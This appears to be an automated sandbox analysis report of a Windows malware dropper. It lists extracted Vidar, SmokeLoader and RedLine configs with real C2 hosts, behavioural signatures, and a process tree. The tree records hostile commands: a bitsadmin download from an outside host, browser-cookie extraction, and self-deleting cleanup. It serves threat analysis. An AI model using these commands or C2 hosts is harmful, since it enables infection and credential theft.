Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1806s
  • max time network
    1813s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    28-07-2021 15:34

General

  • Target

    8 (19).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

vidar

Version

39.8

Botnet

921

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    921

Extracted

Family

redline

Botnet

NEW_5k

C2

86.106.181.209:18845

Extracted

Family

redline

Botnet

28_7_r

C2

zertypelil.xyz:80

Extracted

Family

vidar

Version

39.8

Botnet

865

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    865

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • suricata: ET MALWARE Win32/Kelihos.F exe Download 2
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 7 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 12 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • autoit_exe 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 9 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 28 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 20 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
      PID:1088
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Themes
      1⤵
        PID:1292
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
          PID:2572
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
            PID:2748
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
            1⤵
            • Modifies registry class
            PID:2800
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
            1⤵
              PID:2820
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
              1⤵
                PID:2536
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1900
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                  1⤵
                    PID:1448
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                    1⤵
                      PID:1216
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:296
                      • C:\Windows\system32\rundll32.exe
                        C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\luiTolL\luiTolL.dll",luiTolL
                        2⤵
                        • Windows security modification
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        PID:5092
                      • C:\Users\Admin\AppData\Roaming\ditusvw
                        C:\Users\Admin\AppData\Roaming\ditusvw
                        2⤵
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5312
                      • C:\Users\Admin\AppData\Roaming\catusvw
                        C:\Users\Admin\AppData\Roaming\catusvw
                        2⤵
                        • Suspicious use of SetThreadContext
                        PID:5412
                        • C:\Users\Admin\AppData\Roaming\catusvw
                          C:\Users\Admin\AppData\Roaming\catusvw
                          3⤵
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:4300
                      • C:\Users\Admin\AppData\Roaming\ditusvw
                        C:\Users\Admin\AppData\Roaming\ditusvw
                        2⤵
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5048
                      • C:\Users\Admin\AppData\Roaming\catusvw
                        C:\Users\Admin\AppData\Roaming\catusvw
                        2⤵
                        • Suspicious use of SetThreadContext
                        PID:5376
                        • C:\Users\Admin\AppData\Roaming\catusvw
                          C:\Users\Admin\AppData\Roaming\catusvw
                          3⤵
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:4044
                      • C:\Users\Admin\AppData\Roaming\ditusvw
                        C:\Users\Admin\AppData\Roaming\ditusvw
                        2⤵
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:6128
                      • C:\Users\Admin\AppData\Roaming\catusvw
                        C:\Users\Admin\AppData\Roaming\catusvw
                        2⤵
                        • Suspicious use of SetThreadContext
                        PID:5940
                        • C:\Users\Admin\AppData\Roaming\catusvw
                          C:\Users\Admin\AppData\Roaming\catusvw
                          3⤵
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:1552
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                      1⤵
                        PID:352
                      • C:\Users\Admin\AppData\Local\Temp\8 (19).exe
                        "C:\Users\Admin\AppData\Local\Temp\8 (19).exe"
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:856
                        • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                          "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:2972
                          • C:\Users\Admin\AppData\Local\Temp\7zSC9B474F4\setup_install.exe
                            "C:\Users\Admin\AppData\Local\Temp\7zSC9B474F4\setup_install.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of WriteProcessMemory
                            PID:2392
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_1.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2256
                              • C:\Users\Admin\AppData\Local\Temp\7zSC9B474F4\sonia_1.exe
                                sonia_1.exe
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:3256
                                • C:\Users\Admin\AppData\Local\Temp\7zSC9B474F4\sonia_1.exe
                                  "C:\Users\Admin\AppData\Local\Temp\7zSC9B474F4\sonia_1.exe" -a
                                  6⤵
                                  • Executes dropped EXE
                                  PID:3860
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_2.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2188
                              • C:\Users\Admin\AppData\Local\Temp\7zSC9B474F4\sonia_2.exe
                                sonia_2.exe
                                5⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: MapViewOfSection
                                PID:3756
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_3.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:804
                              • C:\Users\Admin\AppData\Local\Temp\7zSC9B474F4\sonia_3.exe
                                sonia_3.exe
                                5⤵
                                • Executes dropped EXE
                                • Modifies system certificate store
                                PID:3852
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 1664
                                  6⤵
                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                  • Program crash
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4656
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_4.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:816
                              • C:\Users\Admin\AppData\Local\Temp\7zSC9B474F4\sonia_4.exe
                                sonia_4.exe
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3788
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_6.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2332
                              • C:\Users\Admin\AppData\Local\Temp\7zSC9B474F4\sonia_6.exe
                                sonia_6.exe
                                5⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Suspicious use of WriteProcessMemory
                                PID:2868
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  6⤵
                                  • Executes dropped EXE
                                  PID:4020
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4692
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  6⤵
                                    PID:5988
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    6⤵
                                      PID:5068
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c sonia_7.exe
                                  4⤵
                                    PID:3232
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_5.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:3960
                                    • C:\Users\Admin\AppData\Local\Temp\7zSC9B474F4\sonia_5.exe
                                      sonia_5.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      PID:3664
                                      • C:\Users\Admin\Documents\wqQNuXMtCnt1mxFb4sybl5J2.exe
                                        "C:\Users\Admin\Documents\wqQNuXMtCnt1mxFb4sybl5J2.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4960
                                      • C:\Users\Admin\Documents\hObv245YwhoWP5AYHg6Y1dOX.exe
                                        "C:\Users\Admin\Documents\hObv245YwhoWP5AYHg6Y1dOX.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4948
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c taskkill /f /im chrome.exe
                                          7⤵
                                            PID:4184
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im chrome.exe
                                              8⤵
                                              • Kills process with taskkill
                                              PID:5260
                                        • C:\Users\Admin\Documents\Lw4GOn4TNGnQ47JDXeZWq_1J.exe
                                          "C:\Users\Admin\Documents\Lw4GOn4TNGnQ47JDXeZWq_1J.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          PID:4936
                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            7⤵
                                              PID:5744
                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                              7⤵
                                              • Executes dropped EXE
                                              PID:5840
                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              7⤵
                                              • Executes dropped EXE
                                              PID:5632
                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                              7⤵
                                              • Executes dropped EXE
                                              PID:692
                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              7⤵
                                                PID:6036
                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                7⤵
                                                  PID:6072
                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:5564
                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                  7⤵
                                                    PID:4436
                                                • C:\Users\Admin\Documents\ez_BF7fufUsv3EJUr6nzWPR0.exe
                                                  "C:\Users\Admin\Documents\ez_BF7fufUsv3EJUr6nzWPR0.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of FindShellTrayWindow
                                                  • Suspicious use of SendNotifyMessage
                                                  PID:4924
                                                  • C:\Users\Public\run.exe
                                                    C:\Users\Public\run.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:5772
                                                    • C:\Users\Public\run.exe
                                                      C:\Users\Public\run.exe
                                                      8⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      PID:5528
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\run.exe"
                                                        9⤵
                                                          PID:5384
                                                          • C:\Windows\SysWOW64\timeout.exe
                                                            timeout /T 10 /NOBREAK
                                                            10⤵
                                                            • Delays execution with timeout.exe
                                                            PID:5992
                                                  • C:\Users\Admin\Documents\R9iYK6ThrV0eiLSSsUYjgxIe.exe
                                                    "C:\Users\Admin\Documents\R9iYK6ThrV0eiLSSsUYjgxIe.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:4912
                                                    • C:\Users\Admin\Documents\R9iYK6ThrV0eiLSSsUYjgxIe.exe
                                                      "C:\Users\Admin\Documents\R9iYK6ThrV0eiLSSsUYjgxIe.exe"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Checks SCSI registry key(s)
                                                      • Suspicious behavior: MapViewOfSection
                                                      PID:2476
                                                  • C:\Users\Admin\Documents\KIkIKViB6A0_HDikbQQuDOrW.exe
                                                    "C:\Users\Admin\Documents\KIkIKViB6A0_HDikbQQuDOrW.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:4896
                                                    • C:\Users\Admin\Documents\KIkIKViB6A0_HDikbQQuDOrW.exe
                                                      C:\Users\Admin\Documents\KIkIKViB6A0_HDikbQQuDOrW.exe
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:4400
                                                    • C:\Users\Admin\Documents\KIkIKViB6A0_HDikbQQuDOrW.exe
                                                      C:\Users\Admin\Documents\KIkIKViB6A0_HDikbQQuDOrW.exe
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:4968
                                                  • C:\Users\Admin\Documents\L8_HsiqiK0KNhdupkrUBTSN7.exe
                                                    "C:\Users\Admin\Documents\L8_HsiqiK0KNhdupkrUBTSN7.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Checks BIOS information in registry
                                                    • Checks whether UAC is enabled
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5040
                                                  • C:\Users\Admin\Documents\KX7qggSCAWg3CGulWOHt9G3p.exe
                                                    "C:\Users\Admin\Documents\KX7qggSCAWg3CGulWOHt9G3p.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5100
                                                  • C:\Users\Admin\Documents\4vvyDJKSxySgJa_wc6u0MyGc.exe
                                                    "C:\Users\Admin\Documents\4vvyDJKSxySgJa_wc6u0MyGc.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:3112
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\4vvyDJKSxySgJa_wc6u0MyGc.exe"
                                                      7⤵
                                                        PID:5604
                                                        • C:\Windows\SysWOW64\timeout.exe
                                                          timeout /T 10 /NOBREAK
                                                          8⤵
                                                          • Executes dropped EXE
                                                          • Delays execution with timeout.exe
                                                          PID:5744
                                                    • C:\Users\Admin\Documents\9VL2Wo6c2QI5jZHdfeLwdRpj.exe
                                                      "C:\Users\Admin\Documents\9VL2Wo6c2QI5jZHdfeLwdRpj.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5108
                                                      • C:\Users\Admin\Documents\9VL2Wo6c2QI5jZHdfeLwdRpj.exe
                                                        C:\Users\Admin\Documents\9VL2Wo6c2QI5jZHdfeLwdRpj.exe
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Checks processor information in registry
                                                        PID:644
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im 9VL2Wo6c2QI5jZHdfeLwdRpj.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\9VL2Wo6c2QI5jZHdfeLwdRpj.exe" & del C:\ProgramData\*.dll & exit
                                                          8⤵
                                                            PID:5384
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /im 9VL2Wo6c2QI5jZHdfeLwdRpj.exe /f
                                                              9⤵
                                                              • Kills process with taskkill
                                                              PID:4108
                                                            • C:\Windows\SysWOW64\timeout.exe
                                                              timeout /t 6
                                                              9⤵
                                                              • Delays execution with timeout.exe
                                                              PID:5640
                                                      • C:\Users\Admin\Documents\cIvGlY_INJLd9aQdMUWB7tCl.exe
                                                        "C:\Users\Admin\Documents\cIvGlY_INJLd9aQdMUWB7tCl.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:5088
                                                      • C:\Users\Admin\Documents\Srvrq1leujMqRjYnzZTLajaE.exe
                                                        "C:\Users\Admin\Documents\Srvrq1leujMqRjYnzZTLajaE.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Drops file in Program Files directory
                                                        PID:4232
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc97BE.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:4992
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc97BE.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:4996
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc97BE.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:5072
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc97BE.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:2192
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc97BE.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:1576
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc97BE.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:6044
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc97BE.tmp\tempfile.ps1"
                                                                      7⤵
                                                                      • Checks for any installed AV software in registry
                                                                      PID:5504
                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                      "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • Drops startup file
                                                                      • Download via BitsAdmin
                                                                      PID:5004
                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pHg10WmsiborYicZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • Drops file in Program Files directory
                                                                      PID:3084
                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pnLBevXQnRnohLuH -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:4972
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc97BE.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:4536
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc97BE.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:5580
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc97BE.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:5952
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc97BE.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:5340
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc97BE.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:5512
                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\luiTolL\luiTolL.dll" luiTolL
                                                                                7⤵
                                                                                • Loads dropped DLL
                                                                                PID:5256
                                                                                • C:\Windows\system32\rundll32.exe
                                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\luiTolL\luiTolL.dll" luiTolL
                                                                                  8⤵
                                                                                  • Loads dropped DLL
                                                                                  • Drops file in System32 directory
                                                                                  • Drops file in Program Files directory
                                                                                  PID:2192
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
